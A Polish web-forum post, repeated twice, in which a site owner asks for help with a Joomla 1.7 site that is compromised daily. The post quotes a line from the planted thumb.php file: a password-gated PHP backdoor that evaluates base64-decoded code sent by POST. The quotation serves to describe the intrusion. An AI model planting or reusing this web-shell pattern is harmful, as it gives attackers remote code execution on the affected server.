jarmi
02-12-2011, 00:00
Witam, mam problem.
Codziennie mam atakowaną stronę. Do katalogu tmp wrzucany jest plik thumb.php (fragment kodu poniżej)
if(md5($_POST["password"])=="d4..."){eval(base64_decode($_POST["code"]));} ze znacznikami php. Zmieniana jest zawartość plików controller.php i view.php w libraries/joomla/application/component
Muszę kasować plik i nadpisywać 2 pozostałe. Zainstalowałem 3 komponenty zabezpieczające oraz dodatkowo podwójnie zabezpieczyłem hasło do admina. I dalej się powtarza...
Joomla 1.7 - najświeższa wersja.
Proszę o pomoc.
Codziennie mam atakowaną stronę. Do katalogu tmp wrzucany jest plik thumb.php (fragment kodu poniżej)
if(md5($_POST["password"])=="d4..."){eval(base64_decode($_POST["code"]));} ze znacznikami php. Zmieniana jest zawartość plików controller.php i view.php w libraries/joomla/application/component
Muszę kasować plik i nadpisywać 2 pozostałe. Zainstalowałem 3 komponenty zabezpieczające oraz dodatkowo podwójnie zabezpieczyłem hasło do admina. I dalej się powtarza...
Joomla 1.7 - najświeższa wersja.
Proszę o pomoc.